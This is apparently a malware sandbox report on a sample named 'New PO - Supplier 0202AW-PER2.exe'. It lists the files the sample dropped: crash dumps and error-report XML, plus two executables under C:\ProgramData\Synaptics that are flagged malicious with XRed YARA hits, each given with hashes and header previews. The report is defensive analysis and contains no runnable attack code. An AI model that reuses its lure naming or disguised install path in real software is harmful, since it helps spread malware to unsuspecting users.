                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.5.3.4.5.1.2.9.4.9.7.8.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.5.3.4.5.3.9.5.9.0.4.0.6.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.6.8.3.d.5.8.7.-.3.b.9.6.-.4.6.e.b.-.9.a.c.6.-.8.5.0.4.e.7.5.b.9.e.f.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.f.7.f.4.9.7.3.-.0.4.4.e.-.4.b.f.4.-.9.3.5.f.-.1.d.f.b.9.d.5.6.7.c.e.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e...................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_913a4e3155b8397e17a07eeb3ceae295599234e5_455b7b6e_eb3bbace-472b-477f-a593-7d3f2b06a824\Report.wer

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):1.1371276189919388
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:dKFcVpsOII0C/ay5xXDzJDzqjLOA/FFmOVzuiFDZ24IO8EKDzy:00yOOC/ay5hJqjEqzuiFDY4IO8zy
                                                                                                                                MD5:F2ACE7CCC055537CF8DB10959BA0EAA6
                                                                                                                                SHA1:07804EEC19F8C2DB8DD714CEFA31D32D7127A8E2
                                                                                                                                SHA-256:27EAF04BE55C7442BED21B4030A9483D922CB42A9CF1F04F9AF03B6020D41076
                                                                                                                                SHA-512:D5C19D3B09C54F5599EB90C55ADB76748276A461790DD40698421BD92D0C1AC8C5A6251252F89597235218E22DBCF336FCBD8E16656D9C3068B22B331EEF89F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.5.3.4.5.4.5.0.5.0.1.3.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.5.3.4.6.1.7.0.3.4.4.8.1.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.b.3.b.b.a.c.e.-.4.7.2.b.-.4.7.7.f.-.a.5.9.3.-.7.d.3.f.2.b.0.6.a.8.2.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.0.7.d.1.6.0.2.-.c.d.3.1.-.4.7.8.1.-.9.f.9.4.-.9.a.a.b.7.f.0.a.2.7.4.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.e.c.-.0.0.0.1.-.0.0.1.4.-.f.5.f.7.-.c.7.0.f.2.8.5.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.c.3.4.2.e.2.6.9.7.2.c.1.e.e.7.8.b.8.4.0.9.9.9.8.3.8.6.e.0.2.1.2.2.3.4.f.6.b.8.0.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_e73781c637c020daee3de6ae263d2d0a91f2a4c_455b7b6e_ade2be3c-2921-4830-8bbf-2410d8bfe9ef\Report.wer

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):0.06964971902783561
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:QzQ8WkRl97Wk0KOA8xbJAHlHglB+oRO5d:kiQl9SPKONbJ4YB+z
                                                                                                                                MD5:77AEC1A056C858B2AEC33328D0A87093
                                                                                                                                SHA1:A506444D093200CAA43413A6890728829B8D1C96
                                                                                                                                SHA-256:599386C7D939004C125FA265F20B5E4F64C356053A9033127F3DCA51026D6B68
                                                                                                                                SHA-512:45D9099CF55FA6D070E07FAD6B61D9C82F5315F3EFEAFFEC188EEB8FDAF3A751FEBDB85B74194E6EE8A9E55AA2668DE05A22CD723E798103C10E5A84B90E9096
                                                                                                                                Malicious:false
                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.5.3.4.6.2.4.8.8.9.1.7.8.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.5.3.4.6.3.8.1.0.7.9.1.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.d.e.2.b.e.3.c.-.2.9.2.1.-.4.8.3.0.-.8.b.b.f.-.2.4.1.0.d.8.b.f.e.9.e.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.e.8.b.b.1.8.4.-.c.1.f.a.-.4.2.1.3.-.9.8.4.1.-.a.c.6.1.e.8.c.8.6.1.0.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e...................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3092.tmp.dmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Tue Dec 24 17:22:03 2024, 0x1205a4 type
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8551664
                                                                                                                                Entropy (8bit):2.3104446929642766
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:RLuxjkYRbaUUf0G7v68KZPNSY2eWCRu2JHr3PcPOFI7tzCBPHpuWqFItm5r8joRI:ZutdYmdPL4U3PUOStzCBPHSFItgrTe
                                                                                                                                MD5:0DF66DFA570C3DE2CA3E0CD7274ECA00
                                                                                                                                SHA1:385CDA2AE3CA765B3F29097C62211E72056EE223
                                                                                                                                SHA-256:29888F74F171896C43285F6BCA48A4FB8C21C84FF79D4259792E0A6FCB9273BF
                                                                                                                                SHA-512:A759C4EA93D18E4C996A01D7032A70F739F73FEC4A3DAF86EBA2B412D31218E37AAE317096AE857505C3FECCFAC714254749B0A8DA065CDE02F6BB288BBBA42C
                                                                                                                                Malicious:false
                                                                                                                                Preview:MDMP..a..... .........jg....................................$...`......................`.......8...........T................~.....................p...............................................................................eJ..............GenuineIntel............T...........@.jg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER96A0.tmp.WERInternalMetadata.xml

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6338
                                                                                                                                Entropy (8bit):3.720373109006611
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:R6l7wVeJoxU6kw19YiSeDprE89b9ysf3+3fm:R6lXJ36kw19Y2/9xf3+u
                                                                                                                                MD5:65A001C45C296E8C276F3F1851A925B0
                                                                                                                                SHA1:190ABE3814EDFF66D122DB63A9F0828C6A0010F4
                                                                                                                                SHA-256:EC5CBA1997B250E284D058F52DA00BE87C5A8FE84DC777FEEFEE45A54740FE82
                                                                                                                                SHA-512:534EBE0FD81E04857AF4650F2195B1D738A39835DBEBF002D7A36D42B08893042EF73A159876E5A7577D8D3F65C59B38F01DBFE67E5D9C6D4AE4E7625E5DD908
                                                                                                                                Malicious:false
                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.7.6.<./.P.i.

                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER96D0.tmp.xml

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4572
                                                                                                                                Entropy (8bit):4.4521185551347875
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:cvIwWl8zs6Jg77aI938WpW8VY0Ym8M4JFQFxMt+q84iMzZ3d:uIjfII7F17V8JttgMzZ3d
                                                                                                                                MD5:F6EBBCF50316A3A08D31424C0DA4B59C
                                                                                                                                SHA1:C2790FE664F863692E6DA1BDAC5223A7288AC256
                                                                                                                                SHA-256:2FAC0E2B186D3653F1FBABBE1F204865E7F219C714EAF5E2057A5BDB6ECCD440
                                                                                                                                SHA-512:9E8C4AC26F56B4978E60D7536A8E96F2E903CAC78AB8E9EB2BE439BEE1F749AE6F6311538A3887853EA8F9D1D3CE6F30B24183249BF89D913F84D35D310937CB
                                                                                                                                Malicious:false
                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="645625" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERADF0.tmp.dmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Tue Dec 24 17:22:50 2024, 0x1205a4 type
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):15048716
                                                                                                                                Entropy (8bit):1.8808476074898084
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:g6WvRyGEXOEKK1e97C6yd7QFJ7NPcBYekFCPmw0Yj4L6UOn:U0GEGR97CDdsn7tcBsCPlj4L6UO
                                                                                                                                MD5:06CD5D094DFDF7CC0C72EDAE89F4FA63
                                                                                                                                SHA1:F33D8804AE829FCA63C62B934F32DDFAE65BE424
                                                                                                                                SHA-256:92098C447FA01FE6BC14A2EDF05CC0B05DC753E29A6C1F89F38AACBD0D125797
                                                                                                                                SHA-512:07B702975258B066110C3A5DF4D64021FA042C6A37B914561F249BA923A10784A0879733A4AA6FCAFBAD52ABBA3BB507BAF90F5697415920738D5325313D16D0
                                                                                                                                Malicious:false
                                                                                                                                Preview:MDMP..a..... .........jg............t.......................$...0.......t..............`.......8...........T...........H=...b..........T...........@...............................................................................eJ..............GenuineIntel............T...........@.jg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERC5F8.tmp.WERInternalMetadata.xml

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6370
                                                                                                                                Entropy (8bit):3.729028757520049
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:R6l7wVeJoxwh6Fn5vYiQhKdgxLpD789bpysfOjm:R6lXJRh6F5vYvGgkpxf7
                                                                                                                                MD5:B904249CBC7397068F39375F34B78130
                                                                                                                                SHA1:898A789557B59205F466FE254B19698FE7F72C60
                                                                                                                                SHA-256:64D8A532F4CC415EA05ED52260F04CF82031331DE2FCC8D18028F4CFC6CADB5D
                                                                                                                                SHA-512:C951E339A8D0A2158F50CDD212B8819CC9FBF8EB5F3B2D38BFC12BED4F69E6F1B365BD3781DA99F291239B02F9A530703310BF860D39D679BF396F607CE44D5A
                                                                                                                                Malicious:false
                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.7.6.<./.P.i.

                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERC648.tmp.xml

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4614
                                                                                                                                Entropy (8bit):4.489925708611387
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:cvIwWl8zsPJg77aI938WpW8VYncYm8M4JFRFke+q8dMMzZ3d:uIjfxI7F17V+5Jr/MzZ3d
                                                                                                                                MD5:71C48D1932F648955A9459062C6D8ABD
                                                                                                                                SHA1:8C073D32B77F93708A05FC8E807AA0CBD40945F0
                                                                                                                                SHA-256:C5814309D5F40C3F49506A4F5D6D13CAAC3ED803AA5E98F4B43A5635A6EE4533
                                                                                                                                SHA-512:CDE9018A1B56FC2E8765C11022BC69D2928543AF57D0DB19E776F3DD0340EF622523120BF9BFDB46D7D49E7AC9AC71107A9F16A5BD78FD5D5F7BE3F7C2327B3C
                                                                                                                                Malicious:false
                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="645626" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERE6AE.tmp.dmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Tue Dec 24 17:23:47 2024, 0x1205a4 type
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):282490
                                                                                                                                Entropy (8bit):2.71715559281092
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:nCBAgCSeuQwPx/51zq2Swbvk3oYs59rx4oaw5ceoAe6Q0hAaYP:nxvSe4/FDSoYs5FxCB
                                                                                                                                MD5:51E5A5E2E3EF77EB85BD18B8AB730F6E
                                                                                                                                SHA1:DE13F3A0F06E19FF09A740924EC1E1C3E2573B5F
                                                                                                                                SHA-256:3945E529A7A8BC116676C671F639829EA8BC7865FFB8D487BF4BEB57090D62D3
                                                                                                                                SHA-512:E269F2894D18ED3620158707AB850A1609A8E21CA406936B6FFFF37F2E144F24D860AE079CF1DF5290D5C3B82B149BADA8442AF3D1E57894E750CF00BB180C8D
                                                                                                                                Malicious:false
                                                                                                                                Preview:MDMP..a..... .......#.jg............4...............H.......$....&......$...25..........`.......8...........T............H...............'...........)..............................................................................eJ.......)......GenuineIntel............T...........@.jg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERF0B2.tmp.WERInternalMetadata.xml

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6340
                                                                                                                                Entropy (8bit):3.7004337077919875
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:R6l7wVeJox065MYirJkBpDu89bH6sf07GNm:R6lXJH65MYGJkTHZfY
                                                                                                                                MD5:A98AF8403FEE7E67B443C0834DB84075
                                                                                                                                SHA1:AC02B934F41D6A46C1BAD7F08028500D61195294
                                                                                                                                SHA-256:6B9B45FD2A8F849245B7D7E93074C9324CD41FB9BB2EBF987359EE74D8D958F0
                                                                                                                                SHA-512:B193DB333C849C08785F93AC0648D0BC4334A4E003EA18AF2B81778B3C70783C02522EB94721A29DBD475192BFCA7E8E39E0E65670F3C6EA7616EC5F5481264B
                                                                                                                                Malicious:false
                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.7.6.<./.P.i.

                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERF288.tmp.xml

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4580
                                                                                                                                Entropy (8bit):4.44888730288185
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:cvIwWl8zsPJg77aI938WpW8VYeYm8M4JFFFah+q8Z+MzZ3d:uIjfxI7F17VmJErMzZ3d
                                                                                                                                MD5:7D743C58589301A498A7A591E6330458
                                                                                                                                SHA1:F0EB473ABC291C0984AB04E3E46330B1360421DB
                                                                                                                                SHA-256:77179A6C0993D378EFA6A6BD8346933825F53093C9AFCB036BBCF8615CB8BF9D
                                                                                                                                SHA-512:0180327D8E490CD88F7A54BC74F56D66B682585D36A6478F9D6773E6DB96AB1FB119AA55DA9D0A04C918CEB3B46F1481BB1311F9DBDBCF41034D3565B0706E83
                                                                                                                                Malicious:false
                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="645626" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                C:\ProgramData\Synaptics\RCX76FB.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):771584
                                                                                                                                Entropy (8bit):6.6311521779536164
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I+mr:ansJ39LyjbJkQFMhmC+6GD9f6
                                                                                                                                MD5:B30E717CDE0FA4A5DE907A7148308430
                                                                                                                                SHA1:C342E26972C1EE78B8409998386E0212234F6B80
                                                                                                                                SHA-256:12C8A50563F8B33F2613CA55AEE26FBE5473D68593D8E10E13C4D44D258B4E2A
                                                                                                                                SHA-512:B6FEB72243722ABE8F7E35784ABC386D9373BD652722334A1E2FB5B614CD857E1EB8A44C7593D2C1AB347C490E63371D3AB5FA4698D3BF3A63EC88A897A7440C
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX76FB.tmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX76FB.tmp, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1684992
                                                                                                                                Entropy (8bit):7.4649180860888515
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:gnsHyjtk2MYC5GDGfhloJfKoKqh1X+T9f8z:gnsmtk2aNfhlHoKqzX+Sz
                                                                                                                                MD5:17FB4F9DF5175E684A3427C5997B2007
                                                                                                                                SHA1:C7B207497E0171FBB8FCA648D82753ABBF42B0B8
                                                                                                                                SHA-256:8F66247597F18A7B3F20DBDF2D29330F716222BD500A7A95642137E84FA3B3D3
                                                                                                                                SHA-512:ED454B9588AB5209A926395C03B7E1EE35231BB77F66895187EBE86A3E94FC3568A247983946021887DEF3E4F396705142134ABFDEB857B9E040DD863FE6D51D
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
